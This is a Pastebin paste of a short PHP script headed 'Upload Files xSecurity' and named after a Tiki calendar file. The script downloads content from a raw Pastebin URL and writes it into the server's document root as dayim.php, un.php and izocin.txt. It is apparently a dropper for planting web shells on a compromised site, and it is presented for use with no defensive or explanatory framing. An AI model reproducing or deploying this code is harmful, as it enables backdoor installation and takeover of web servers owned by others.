Advertisement
anvenger

tiki-calendar.php

Jul 16th, 2018
233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.12 KB | None | 0 0
  1. <?php
  2. echo '<title>Upload Files xSecurity</title>';
  3. function http_get($url){
  4. $im = curl_init($url);
  5. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  6. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  7. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  8. curl_setopt($im, CURLOPT_HEADER, 0);
  9. return curl_exec($im);
  10. curl_close($im);
  11. }
  12. $check = $_SERVER['DOCUMENT_ROOT'] . "/dayim.php" ;
  13. $text = http_get('https://pastebin.com/raw/cq1FZ2pK');
  14. $open = fopen($check, 'w');
  15. fwrite($open, $text);
  16. fclose($open);
  17. if(file_exists($check)){
  18. echo $check."</br>";
  19. }else
  20. echo "not exits";
  21. echo "done .\n " ;
  22.  
  23. $check0 = $_SERVER['DOCUMENT_ROOT'] . "/un.php" ;
  24. $text0 = http_get('https://pastebin.com/raw/cq1FZ2pK');
  25. $open0 = fopen($check0, 'w');
  26. fwrite($open0, $text0);
  27. fclose($open0);
  28. if(file_exists($check0)){
  29. echo $check0."</br>";
  30. }else
  31. echo "not exits";
  32. echo "done .\n " ;
  33. $check3=$_SERVER['DOCUMENT_ROOT'] . "/izocin.txt" ;
  34. $text3 = http_get('https://pastebin.com/raw/cq1FZ2pK');
  35. $op3=fopen($check3, 'w');
  36. fwrite($op3,$text3);
  37. fclose($op3);
  38. if(file_exists($check3)){
  39. echo $check3."</br>";
  40. }else
  41. echo "not exits";
  42. echo "done .\n " ;
  43. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement